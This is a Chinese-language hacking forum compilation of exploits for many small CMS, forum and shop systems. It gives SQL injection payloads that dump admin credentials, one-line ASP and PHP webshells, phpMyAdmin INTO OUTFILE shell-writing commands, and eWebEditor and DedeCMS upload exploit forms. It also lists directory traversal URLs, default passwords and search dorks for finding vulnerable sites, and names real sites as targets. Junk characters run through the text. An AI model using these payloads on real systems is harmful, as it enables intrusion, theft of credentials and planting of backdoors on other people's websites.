启航企业建站系统 cookie注入漏洞通杀所有版本+ ]0 e$ I6 i( f3 `- b
8 h1 L# |6 U0 ?- m8 @. L; @4 I直接上exploit:3 W) l. U* p7 b& q
javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
4 V/ H _3 N* H; C! Q/ ptest:http://www.tb11.net/system/xitong/shownews.asp?id=210
) W& M m, K" {. V: N: A# A' x--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
8 P3 Z0 M$ q) R$ \8 H+ xAsprain论坛 注册用户 上传图片就可拿到webshell, a. v5 _8 W- u# _
! {: z0 W/ H' }) I b0 S8 Y( |
Asprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。. c: C- H+ x& F1 k
1.txt存放你的一句话马 如:<%execute(request("cmd"))%>
6 G, m w L! V* X5 `0 G2.gif 为一小图片文件,一定要小,比如qq表情图片
) m$ |2 D, S7 `) g5 ?" v3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用
3 s/ R* `! t8 d9 n) L' l' ^4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了0 `( N1 e1 D% U
5.q.asp;.gif
6 u2 k9 \- ~8 X; A6 b u" mgoogle:Powered by Asprain/ l7 j: i0 w& x4 R& U
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
3 x. R) s4 |6 m$ S5 R. B
* t* z, Q4 y; @ShopNum1全部系统存在上传漏洞。
& m1 d! k0 k" M4 g: w6 N4 n( ^+ r V0 f0 ~1 S! F+ V; N1 L6 d
首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。
9 _/ @4 p0 R: w5 I按说明 提示登录后台。。7 L2 Z* T1 o/ @* W: [3 a2 N
在后台功能页面->附件管理->附件列表
- r0 m# ]: t* B k: i" E P可以直接上传.aspx 后缀木马
( y( J6 J6 R# [$ j* ~http://demo.shopnum1.com/upload/20110720083822500.aspx) j8 h8 z; A! p# S y* M1 c
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------& I2 I: f4 b0 G
" |: }# K( F+ s7 ~( ]
牛牛CMS中小企业网站管理系统 上传漏洞
6 C* y" }/ a3 i* L- L" Y% Z
/ F% _6 F0 a& H0 F牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。
) m. P" h9 |" ~, N. H后台:admin/login.asp
0 p* z" A* n7 zewebeditor 5.5 Nday, R: @' r3 f' S" w0 B/ ]
exp:" S/ e# X. K% P
<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?
7 o& N& ]& A1 I% J! h a<input?type=file?name=uploadfile?size=100><br><br>?" n+ S" V. E. Q7 G5 _0 _
<input?type=submit?value=upload>?3 S$ f2 t3 L) |& l) M2 U# o
</form>
" m* U5 ^% f fps:先上传小马.
) N& a) [# Y! l5 }! y tinurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏
' z. E. J9 }0 m/ S4 P$ O; `
4 u% e$ }0 Q- b9 C' D7 k--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
6 ~( ` R* m' {8 `) ~! C# i, x8 [! p; S% i( O" d5 ?7 K
YothCMS 遍历目录漏洞
4 f! ^4 \+ N+ |9 Y
6 I( ?. _ v; S- _* n5 D Z, g1 T优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。5 Y4 v. f. q: T q2 ?0 A" O" {
默认后台:admin/login.asp
0 I- d) ^- a' g遍历目录:. }8 Y" {7 o* o$ ~7 v
ewebeditor/manage/upload.asp?id=1&dir=../
$ R. r8 }+ \# b g7 {- ?data:
0 s. @0 D, d7 Q8 v/ Yhttp://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa: ^6 ] X/ g- u" q* k- G
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
' d7 E& a6 y) R1 D/ |1 q, z9 l2 O1 J% K3 s! L9 j
Net112企业建站系统 1.0
7 N- ]: j3 H* \4 a( O
; h0 `5 g5 Q( ~' E- \1 f$ F源码简介:
1 ~" j3 I+ l6 M) m8 t1 s3 ]1 t9 [+ zNet112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。: Y9 @; f! `9 ?
添加管理员:# q2 _( j" a9 E: B( I1 _
http://www.0855.tv/admin/admin.asp?action=add&level=2
( d/ O( I: q4 u其实加不加都不是很重要,后台文件都没怎么作验证。
0 b# P: F# M l. p8 w5 X7 E上传路径:
- |& q' ]" | B" d0 _* S- J6 C$ Nhttp://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=200
: S% n, S! q" Yhttp://www.0855.tv/inc/Upfile.asp?Stype=2 i k1 Y S! X9 [
怎么利用自己研究。; u. m/ A' g9 \( ~- u0 v# ]
遍历目录:
4 f0 ?3 B" O/ Rhttp://www.0855.tv/admin/upfile.asp?path=../..
3 M7 L3 a+ @4 I. H6 }# A5 p如:: j. f. |, a3 f' k
http://www.0855.tv/admin/upfile.asp?path=../admin
! |) ^& F: p0 B/ O" rhttp://www.0855.tv/admin/upfile.asp?path=../data( D6 O8 D4 K u3 j3 k: u# M. q
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------1 J8 r# o v1 h5 C* j
; z6 G% r g: Z/ c$ Q& Z
易和阳光购物商城通杀 上传漏洞7 f- \6 E8 j0 E. r; V. X6 |
@2 u1 o# Q& G+ N w
前提要求是IIS6.0+asp坏境。# I" Z4 S. M6 p7 C9 d! X3 G8 ?
漏洞文件Iheeo_upfile.asp 4 Z% O }* x/ n: p& a' O
过滤不严.直接可以iis6.0上传
/ }+ l: `6 W6 |$ ^- a e' d- F# X把ASP木马改成0855.asp;1.gif4 V; X% r% p, P. _" H b0 t
直接放到明小子上传
* a1 B: [# ?& k3 j3 ]4 ?Google搜索:inurl:product.asp?Iheeoid=7 G3 D) h# l$ }
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
4 s, x Q9 ~; ~7 b1 \9 s
2 ~6 D- Z6 c) Q* c/ D/ O: I0 I Gphpmyadmin后台4种拿shell方法) f8 `% p. _6 f- f: F2 }
/ b+ n; @1 ^1 U; [9 ?. c方法一:
. E+ W* s# E7 tCREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );9 x: T# l, X. X+ B$ n- T' }% n
INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');
9 R: z# B& ~9 i8 F% a7 LSELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';; W- b H1 X! x; ?) }3 s0 U. p6 S/ P
----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php T8 W- f1 p g* @
一句话连接密码:xiaoma
5 Y0 U2 C- L1 y! h. Z方法二:
. j8 A1 J$ s3 kCreate TABLE xiaoma (xiaoma1 text NOT NULL);
3 m4 n9 g1 ]8 b, dInsert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');
& `3 }) d% H: ?! g% h) \select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';/ w( T; ~7 U& Q, V; V ^3 Q2 @
Drop TABLE IF EXISTS xiaoma;5 u u1 F" X, ~# k
方法三:
1 c. t' K1 C* A3 F0 g3 ^读取文件内容: select load_file('E:/xamp/www/s.php');4 U" R- {- H2 `3 \9 u
写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'& A" S, `& N' ]7 ?# D
cmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
* c1 V0 S& l, c5 Z' e方法四:' r; B. d( ~, w
select load_file('E:/xamp/www/xiaoma.php');
7 ]8 c0 u9 G& u: A- B6 f; k: Wselect '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
; ?* @+ i/ J% i' S% Q+ k然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir
' `/ V6 ?$ M4 m& b2 u" Y. U1 M--------------------------------------------------------------------------------------------------------------------------------------------------------------------------" `9 H; C0 a5 Z2 J: Q
! ?; g+ M6 D5 Y J
传信网络独立开发网站源码0day漏洞
; c" w" H4 l% V) y$ p; u' Q3 K1 V! Z+ ]% R
后台system/login.asp
( G- c( O8 o1 h/ Z进了后台有个ewebeditor, D7 V( u; r, y! y
Google 搜索inurl:product1.asp?tyc=
' [+ g2 z( r6 {% b' N! w编辑器漏洞默认后台ubbcode/admin_login.asp' x. q9 Q9 X$ q% c: @4 V
数据库ubbcode/db/ewebeditor.mdb [$ r6 i: ~6 N) l u
默认账号密码yzm 111111
4 r4 Z! y1 i R
1 L- K" N' e, A( T: p拿webshell方法
. \( Y5 D+ e1 |. ^& ], s! q. }登陆后台点击“样式管理”-选择新增样式 % [ r4 @) [! I0 o- m
样式名称:scriptkiddies 随便写 6 e. C+ N& O! P
路径模式:选择绝对路径
/ |+ I$ g# y9 m9 u- Q图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx
' U- x% K0 F/ z6 N8 a图片类型比如就是我们要上传的ASP木马格式0 e Q! l# V0 x% x/ K* L
上传路径:/
3 ]. A6 J4 o! P9 p图片限制:写上1000 免的上不了我们的asp木马
9 ^ }0 N+ i3 k$ d5 ?6 \0 O2 |6 C上传内容不要写
! E4 O. x+ q' C& i( H可以提交了 4 l2 A+ E- d$ |9 J4 }+ ^$ @
样式增加成功!
8 f; {9 R T* M6 A+ l8 P8 p `返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏 # w# A( D, Q7 H0 y
按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置
2 J) R0 P0 i% x6 M4 j* D8 f3 L网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies1 C( y. l- n. Z+ {6 `4 a
上ASP木马 回车 等到路径
/ N$ t7 M5 ?9 _% `8 d' P- x. t$ P( j4 F0 I" U
后台:system/login.asp
" d( A& P0 H/ T* Q5 x( aExp:
' C7 h1 m6 `# _/ u9 Tand 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master E4 N8 R( `- k8 a! q- y1 h9 \+ e
测试:3 W1 j: T4 Q* ]* [: P
http://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
8 b( d" F; D- Xhttp://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master
& @7 l/ h& ^3 B) |+ H9 K--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
1 [ Q' I: e( S5 r8 g, H& ]( Y2 p# c6 H) j7 T( N
foosun 0day 最新注入漏洞
$ N. }! o, Q e# @/ J
9 S% o- R. i$ u; E. ?3 ]# G1 A$ o漏洞文件:www.xxx.com/user/SetNextOptions.asp: m5 {, z+ K, ]" Z
利用简单的方法:
% A6 V7 ?" P) p暴管理员帐号:3 w- k+ a/ N2 x* m
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin" b$ P& S! E1 Q+ `
暴管理员密码:
# x$ w4 i4 x& W, t2 y+ ] Qhttp://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,% G9 p }- {1 s( y
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------* Y1 A7 N6 ?% h% x
! q8 o1 V8 {& N网站程序的版权未知!' y- o/ q/ Y) O, n7 \
7 L- p6 _8 W, U! I. Y* n+ t- p! _默认网站数据库:" M {! g2 [4 c1 g
www.i0day.com/data/nxnews.mdb
* d5 c- x O1 ]0 {" _. hewebeditor 在线编辑器:1 m) X' E0 b+ Z/ m$ A- C+ u# n
编辑器数据库下载地址:www.i0day.com/ewebeditor/db/ewebeditor.mdb
! c) X* T5 b; u8 h) I9 ^* D登录地址:ewebeditor/admin_login.asp3 H- M1 c; t5 I1 W3 D% m7 M' O j4 x
默认密码:admin admin
9 h7 N- F9 G; f, Y登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data
2 b& u0 h- w* ~; {: F7 n4 K' n
2 N: P, k. r8 g6 gSql注入漏洞:2 l0 _ Y# M ]
http://www.i0day.com/detail.asp?id=12- I& v# o$ t- }* M" S
exp:$ s2 Y/ f E2 ~$ X4 Y
union select 1,admin,password,4,5,6,7,8 from admin
% G; c/ b+ x# F% v! d. `7 [6 Z! R W爆出明文帐号/密码
8 @; G3 p4 {( E+ T
3 i* ]; t; G9 z# A# _上传漏洞:
6 ~, C( q4 v2 m( u+ W9 V, K后台+upfile.asp# K2 B% h$ g. d: [; K2 M
如:
2 K9 k( S$ |* `5 U: ^http://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。
$ _" ?4 @, T5 J0 Nshell的地址:网址+后台+成功上传的马
2 V# e/ p4 S2 X7 b- _" B3 L) A! Igoogle:inurl:news.asp?lanmuName=
* u8 p$ D0 \3 K/ j! [0 d------------------------------------------------------------------------------------------------------------------------------------------------------------------------
" v$ w ?/ v, S) o0 O* o4 p, x; ?! |. Y/ t# O. V
dedecms最新0day利用不进后台直接拿WEBSHELL5 ` A; i0 ]& d: e" s
0 D9 R, s9 I. t5 ^% x拿webshell的方法如下:
3 z: L1 m9 }' n6 p0 X, q" }* Y% _# H网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.
! A9 m4 r8 {- e- R( f* m$ T前题条件,必须准备好自己的dede数据库,然后插入数据:
@$ C* n* u, d9 v* p2 |1 pinsert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
& [2 i4 ~! C, ?6 e/ v. T3 J. V; Z) m* ?# \
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。4 r; Y* i& `9 q7 y
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">+ J, ?! Z6 x% F6 T% h5 |
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
" s/ S5 E+ W+ V. c3 P( {' u% |<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
, ~1 B" v5 c/ h$ G Z<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
8 E+ P0 s" O: ~6 q% i- {+ J/ \& n4 |<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />! N5 R6 R; A' T* e& m9 x, _6 G
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
/ ]% |9 ]5 |+ R" r+ X<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />7 u" o4 I4 b2 w. [6 r
<input type="text" value="true" name="nocache" style="width:400">; z/ }( \! f8 ~1 o
<input type="submit" value="提交" name="QuickSearchBtn"><br />5 f9 R6 S+ _: }2 Y! T6 A; e% I
</form>- f% {" i5 S1 ^7 g# v! V
<script>
+ \. ~ Y+ P+ I$ Jfunction addaction()2 G: F- b* B: q+ c! }$ j# q
{1 c5 A1 l8 W& H% ~3 b$ Y
document.QuickSearch.action=document.QuickSearch.doaction.value;
; i0 ^! o7 q/ n7 e/ d4 D}
/ U# @& }& V2 G% [</script>; D9 Z8 B% R' X
-----------------------------------------------------------------------------------------------------------------------------------------------, Y9 R. n- g2 o* o+ }! v
7 R& r. s2 M3 Y% R# A
dedecms织梦暴最新严重0day漏洞: M0 |8 K/ n# B
bug被利用步骤如下:
( Z( s0 |- m8 B0 `+ Fhttp://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root1 A1 _/ y7 V! M" M
把上面{}上的字母改为当前的验证码,即可直接进入网站后台。
( q1 ^0 \0 j2 D% |: D) w D5 i-------------------------------------------------------------------------------------------------------------------------------------------8 B# f/ |6 M% s7 ]; u
6 {& n. {8 ~8 |/ o多多淘宝客程序上传漏洞 - Z: x! m) c8 |9 i
漏洞页面:
8 E# P z5 Z9 J( Dadmin\upload_pic.php
: p3 P& Q% H1 y3 K: Z传送门:
; p: ?" `! C" G3 r# h) @* w6 fhttp://www.www.com/admin/upload_pic.php?uploadtext=slide1$ [9 V* u9 E0 p( m5 |
PS:copy张图片马 直接 xxx.php 上传抓包地址!
4 R) Q8 e3 W: O7 _------------------------------------------------------------------------------------------------------------------------------------------------------
3 U, x0 S% z1 d; \; \8 d* I H, {5 t' }5 f3 M- i" L
无忧公司系统ASP专业版后台上传漏洞
2 t f' j7 p1 R漏洞文件 后台上传% X" h) e h' B5 ~' z( ~2 @
admin/uploadPic.asp
8 @% Z$ f" F/ h- f d. u9 K漏洞利用 这个漏洞好像是雷池的
/ K% Y0 I5 o" @0 c `8 b/ I" Q0 Phttp://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=1; I6 L+ v9 ^" w9 H0 o) a1 U. W4 X
等到的webshell路径:/ o* l" z3 z; K& P
/UploadFiles/scriptkiddies.asp;_2.gif
' T7 p4 H, _/ c2 n---------------------------------------------------------------------------------------------------------------------------------------------------
8 M8 s" f1 m, U, C( \! K1 P4 M& E
& f8 Z. p/ e# C2 ~2 C2 s0 j8 g住哪酒店分销联盟系统2010! n6 A" p9 J& L8 j: W b
Search:
1 [* j3 i! ~) _' [inurl:index.php?m=hotelinfo; k/ r. w) l& y) t/ X! ?
http://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin
7 E8 q( i( l1 k5 y7 D0 F6 j: j' o默认后台:index.php?m=admin/login
/ z+ D$ \# V5 |, P3 {0 ^# ^5 }--------------------------------------------------------------------------------------------------------------------------------------------------7 m9 x+ X5 }+ O/ k
+ u# e8 A1 F7 n+ T! o- @* x" G
inurl:info_Print.asp?ArticleID=: D( M M6 C Z
后台 ad_login.asp0 V7 z' N F! z: P8 X/ f
爆管理员密码:5 j3 H0 k8 t* M( d( d$ s3 a% t: t+ ?
union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin" n- x) A/ @* X/ Y( h
------------------------------------------------------------------------------------------------------------------------------------------------------------
' Q X( D: e4 A( h, v
5 V% k! c2 R* z2 c& _. P( \搜索框漏洞!4 [5 T3 w7 ?) ~8 q
%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='2 v1 p) m3 Q7 h! A; d1 @' e
--------------------------------------------------------------------------------------------------------------------------------------------------------( m$ c! O/ j- A- \, A C5 m' u7 q% u( {
4 Y0 Q3 W2 O3 g! l$ {关键字:
5 f" r: }7 U$ Z7 M E# minurl:/reg_TemletSel.asp?step=26 h9 t; e) ~3 }: S& V
或者
c, d/ h# [' k* L3 o电子商务自助建站--您理想的助手- r% X! E! u! h+ l
-------------------------------------------------------------------------------------------------------------------------------------------------
# e3 W2 o. g# @1 Z5 U+ M$ n& r. U) H& o8 U7 t8 p3 l
iGiveTest 2.1.0注入漏洞
" R/ F, b' I0 _+ IVersion: <= 2.1.06 A$ V- R- V( r2 v8 j+ O, P* @ x8 T
# Homepage: http://iGiveTest.com/
) E8 a$ H9 V, V谷歌关键字: “Powered by iGiveTest”- q m" G: Y- A3 Q
随便注册一个帐号。然后暴管理员帐号和密码
1 m3 v! G' F' o. I* M) P i, }% mhttp://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (11 E+ @* ^% B; ?4 T
------------------------------------------------------------------------------------------------------------------------------------------------$ N. {* t2 N. f8 ]
4 \7 v; q1 X& @- f: MCKXP网上书店注入漏洞
/ e3 ?/ I0 a( f+ A; I工具加表:shop_admin 加字段:admin, n* y# u$ C% ]7 q4 g1 ]6 I0 J
后台:admin/login.asp
7 L" ]% ^" D1 l; z' ?6 ~; M登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/$ n! r- p& x) P4 f: W
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
3 a0 L: m: m& y+ {8 N1 E$ O- Y: S--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
% X% _ S3 k" a" [& O& n( i) O9 l& w5 ^+ [
段富超个人网站系统留言本写马漏洞2 n2 F3 X# W3 } g9 t
源码下载:http://www.mycodes.net/24/2149.htm/ e4 ~1 m5 U" F1 W9 C5 i
addgbook.asp 提交一句话。
. j" u' O% [2 ^ \- M连接: http://www.xxxx.tv/date/date3f.asp' ^9 r! i: T& o# M# ?! Z2 m7 l
google:为防批量,特略!0 {0 N9 o6 r- j) M% E
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
3 P* [( k5 ], c" S8 w4 L
) b5 g- L* m1 `: t2 u( O8 u% A智有道专业旅游系统v1.0 注入及列目录漏洞9 i( ]$ Z6 v6 ^/ Q
默认后台路径:/admin/login.asp/ M0 d% D5 q( U9 M
默认管理员:admin' D8 Y& T H; ^' `
默认密码:123456
/ d G$ w0 D. U8 l( w: DSQL EXP Tset:" P( M2 I) `2 k$ J+ I: E+ f
http://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin& F# y6 i! ]3 h! {
------------------------------------------------------------------------------------------------------------------------------------------------------------------------
) B, L7 r5 y9 G5 T! k
/ {: `7 w" Y! t0 h( g0 J: t9 dewebeditor(PHP) Ver 3.8 本任意文件上传0day
& T6 M5 Y' y4 nEXP:( ~9 E+ Z* C7 O
<title>eWebeditoR3.8 for php任意文件上EXP</title>, d# T/ W# V, k
<form action="" method=post enctype="multip2 }, r7 C/ s" O! s
art/form-data"> 4 }# f- u; M3 I
<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000"> z; {+ o P3 ^; S# {/ w1 c
URL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br>
. w( ?9 I. q0 R4 y$ T0 e5 Z<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1">
1 h, r8 F" P2 I( jfile:<input type=file name="uploadfile"><br> & s! k# `4 p }- C& Q3 y
<input type=button value=submit onclick=fsubmit()>
/ O( C0 U5 a8 e8 k4 x' n</form><br>
2 ~6 A0 W7 N% k2 u' s5 N0 }2 f<script> & w9 L$ H1 [; ^; u: d$ b% @) S6 G9 t
function fsubmit(){
6 A: u6 |; }4 cform = document.forms[0];
* N5 S7 h/ l3 R* cform.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en''; : m4 ]0 \0 X* {! b" d" T
alert(form.action); % {: U1 g; E# J3 Y( [
form.submit();
9 W$ E) m1 h8 V0 a: w" q! r} ( s! e9 f) T5 ]! Q; w- y) S
</script>
0 R* o, x3 v* o4 a" G注意修改里面ewebeditor的名称还有路径。( O* I- k; V! @$ i3 A/ ] f# z
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------9 L9 u$ s6 ^ U% r4 ^8 P
' Z& I( t: Z1 V1 S, W3 w. N7 h% u8 D
提交’时提示ip被记录 防注入系统的利用. S: ], |, l1 W% s3 B1 K, g( D K
网址:http://www.xxx.com/newslist.asp?id=122′ a# L `& c; p& ~% N6 s# y v
提示“你的操作已被记录!”等信息。
! X G1 C% D' [7 K利用方法:www.xxx.com/sqlin.asp看是否存在,存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。- H, J B. M$ C1 c8 Y/ B
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------0 c) [' W) S% Y0 `
3 v7 a! e7 _/ O+ Z6 q
西部商务网站管理系统 批量拿shell-0day, H. X8 T9 a8 v5 e2 v
这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb 4 h7 x7 o( m4 v9 n" W! O
1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛: f/ {: Z. y/ r5 G3 h
2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合
5 O1 g* T0 w! f w; D% p3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂9 o" ?! {' m; V. z: p/ v
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
/ P; y- K% r/ x: W& {8 j( Z. v
- }3 v! r) N4 G; d; e" AJspRun!6.0 论坛管理后台注入漏洞- k5 c. R! G7 H: f3 L
% }6 \" \8 I" W( H7 k) v' ySEBUG-ID:20787 发布时间:2011-04-30 影响版本:8 T! x5 A4 z Q0 S) S1 ^
JspRun!6.0
& t" c* x* s+ x* c; F$ _漏洞描述:5 H/ n# y$ Q+ c0 F
JspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。
3 K B. a. t7 S% l- c: M在处理后台提交的文件中ForumManageAction.java第1940行
( ~8 a; Z* F( e" LString export = request.getParameter("export");//直接获取,没有安全过滤& ^: ^) p$ Y/ X# u/ f5 \
if(export!=null){& n0 c1 J# U. e& C0 K
List> styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...' u1 O/ V) O! ^) H
if(styles==null||styles.size()==0){7 d# q6 z8 u) d# M: I! Z
<*参考% C x. \! P: r8 e# d
nuanfan@gmail.com# i" J3 g$ f( Q+ j2 b' R1 I
*> SEBUG安全建议:" z4 N7 ~/ V1 e! O) R: h' w
www.jsprun.net; Y# r* u7 c1 {1 e" w
(1)安全过滤变量export( [0 N+ ]4 g8 X2 v) L U
(2)在查询语句中使用占位符" i& x; U! B; F, M+ F, |4 k
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
& _# P) |& F: _2 a" D4 t- h+ c/ _, T+ }1 Z
乌邦图企业网站系统 cookies 注入 c0 n' k/ M; o& H% ~- V8 V# M6 b
+ F G4 ~' t S4 ^7 x
程序完整登陆后台:/admin/login.asp* @# [, w Y& q7 t: P
默认登陆帐号:admin 密码:admin8885 a0 m1 l; H3 V T7 n/ s0 l
语句:(前面加个空格)* _% ?$ Y. Y. S' k; _+ f4 @0 A7 w
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin/ ~2 {( l# E8 F/ R( {! U$ `+ ~0 S, `
或者是16个字段:
a0 e5 D% e- ~+ }5 h( iand 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin; x* ]/ d: V1 n7 |1 u( t1 Q6 A3 Y
爆不出来自己猜字段。
) a" u0 X* b) C注入点:http://www.untnt.com/shownews.asp?=881 k% v- |% S& H$ j8 [
getshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp" @8 `. E! `* E8 D) H
关键字:# r( n2 J8 v/ ~0 {6 D2 O6 H
inurl:shownews?asp.id=3 f! M& a0 F0 |% c1 p3 b
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------& Q' ?: Y( m0 N1 ^
- Y+ u$ m& E! q y5 [
CKXP网上书店注入漏洞. N3 D% o. `8 G1 p2 |9 h
& l' B% t( e' g$ v0 l& R0 A4 h& ~9 i工具加表:shop_admin 加字段:admin
* {% B* Z2 J) {/ W后台:admin/login.asp
& I% N. V8 S: |5 ?登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
" _" N* `% c$ V w* vinurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
9 ]" \" W9 l" N2 q---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
; R* `) o9 w' A: n
2 x* y' R Y. o# S5 Y" P+ kYxShop易想购物商城4.7.1版本任意文件上传漏洞: v7 K; I( \8 }' v8 U! v
5 X, b. \( D2 P/ ?- x9 O! H Zhttp://xxoo.com/controls/fckedit ... aspx/connector.aspx" j* a3 a8 y4 p; y$ y* \+ E" I
跳转到网站根目录上传任意文件。4 R4 R/ a( u* \2 _7 `( J' u% s! n
如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件
